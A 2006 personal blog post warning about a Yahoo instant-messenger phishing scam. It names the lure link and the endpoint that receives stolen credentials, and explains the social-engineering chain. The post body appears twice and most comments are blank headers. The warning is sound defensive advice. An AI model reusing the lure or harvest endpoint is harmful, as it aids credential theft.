SPIM, Phishing, and You!
Aug. 10th, 2006 09:50 am![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
lwoodSo, there you are, on your IM client, and a friend sends you a link out of the blue, no hello or anything, just an innocuous link like this:
http:// www . geocities . com / input_on_new_pics_plz
Don't ever go to links that people send you out of the blue without some obvious tip-off: have you been talking already? Is it obviously going to a site in which you have a shared obscure interest?
No?
Then DON'T GO!
If you do, in this case, you get a nice looking page that asks for your Yahoo name and password, which will, if you have that gullible moment, then proceed to collect more usernames and passwords, and it will then have access to all your Yahoogroups--and Yahoo mail, if you use that, and so on.
If this happens to you, no software has been installed on your machine: this is all being done remotely. To lock the asshats back out change your Yahoo password and they will no longer have access. Count yourself lucky, as other spim-trojans do change passwords, as others have found to their peril.
This has been a Public Service Announcement; more details behind this cut.
Picking apart the code reveals several obfuscated URLs and some equally obfuscated Javascript, useful to defeat ad blockers and protect source code. A Geocities ad server in Taiwan is lame, but legitimate. The encrypted Javascript was more than I wanted to pick at, but obfuscated URL's are easy.
The page sends your Yahoo name and password to a lengthy obfuscated URL, which I threw to the demons, particularly http://www.netdemon.net/decode.html. Decoded, your name and password get sent to:
http://www2.fiberbit.net/form/mailto.cgi
Congratulations, it just got e-mailed to Person or Persons Unknown, and your credentials will now be used to collect more names and passwords, which which the aforementioned miscreants can im your friends, get their names and passwords, and e-mail any Yahoogroup to which you are subscribed--if you own a Yahoogroup or two, it gets worse. The only good thing you can say is that, well, at least it didn't change your Yahoo password for you.
This is a clever combination of social engineering (getting people to do what they're already inclined to) and phishing (using a faked legitimate-looking page to get real information)--clever because it's coming along an unexpected vector.
Unexpected...until you're bitten by one. I've known several who were (by this or another), two of whom have extensive experience in IT and therefore Should Have Known Better.
Don't let this happen to you!
-- Lorrie
http:// www . geocities . com / input_on_new_pics_plz
Don't ever go to links that people send you out of the blue without some obvious tip-off: have you been talking already? Is it obviously going to a site in which you have a shared obscure interest?
No?
Then DON'T GO!
If you do, in this case, you get a nice looking page that asks for your Yahoo name and password, which will, if you have that gullible moment, then proceed to collect more usernames and passwords, and it will then have access to all your Yahoogroups--and Yahoo mail, if you use that, and so on.
If this happens to you, no software has been installed on your machine: this is all being done remotely. To lock the asshats back out change your Yahoo password and they will no longer have access. Count yourself lucky, as other spim-trojans do change passwords, as others have found to their peril.
This has been a Public Service Announcement; more details behind this cut.
Picking apart the code reveals several obfuscated URLs and some equally obfuscated Javascript, useful to defeat ad blockers and protect source code. A Geocities ad server in Taiwan is lame, but legitimate. The encrypted Javascript was more than I wanted to pick at, but obfuscated URL's are easy.
The page sends your Yahoo name and password to a lengthy obfuscated URL, which I threw to the demons, particularly http://www.netdemon.net/decode.html. Decoded, your name and password get sent to:
http://www2.fiberbit.net/form/mailto.cgi
Congratulations, it just got e-mailed to Person or Persons Unknown, and your credentials will now be used to collect more names and passwords, which which the aforementioned miscreants can im your friends, get their names and passwords, and e-mail any Yahoogroup to which you are subscribed--if you own a Yahoogroup or two, it gets worse. The only good thing you can say is that, well, at least it didn't change your Yahoo password for you.
This is a clever combination of social engineering (getting people to do what they're already inclined to) and phishing (using a faked legitimate-looking page to get real information)--clever because it's coming along an unexpected vector.
Unexpected...until you're bitten by one. I've known several who were (by this or another), two of whom have extensive experience in IT and therefore Should Have Known Better.
Don't let this happen to you!
-- Lorrie
![[identity profile]](https://www.dreamwidth.org/img/silk/identity/openid.png){kind=small}
no subject
Date: 2006-08-10 05:28 pm (UTC)no subject
Date: 2006-08-10 05:32 pm (UTC)-- Lorrie
no subject
Date: 2006-08-10 07:08 pm (UTC)--Ember--
no subject
Date: 2006-08-10 09:18 pm (UTC)*hugs*
-- Lorrie
no subject
Date: 2006-08-10 05:40 pm (UTC)no subject
Date: 2006-08-10 06:15 pm (UTC)-- Lorrie
no subject
Date: 2006-08-10 09:30 pm (UTC)no subject
Date: 2006-08-10 11:25 pm (UTC)You should tell whoever got bit that they've been bit, though--at least they can fix themselves by changing their yahoo password.
-- Lorrie
no subject
Date: 2006-08-11 07:14 pm (UTC)no subject
Date: 2006-08-11 08:23 pm (UTC)-- Lorrie